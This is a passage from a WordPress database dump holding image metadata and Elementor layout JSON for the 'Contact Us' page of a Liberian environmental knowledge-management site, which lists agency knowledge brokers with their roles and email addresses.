jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"WIN_20160609_11_17_46_Pro-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"WIN_20160609_11_17_46_Pro-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21825,3161,'_elementor_edit_mode','builder'),(21826,3161,'_elementor_template_type','wp-page'),(21827,3161,'_elementor_version','2.8.1'),(21828,3161,'_wp_page_template','default'),(21829,3161,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"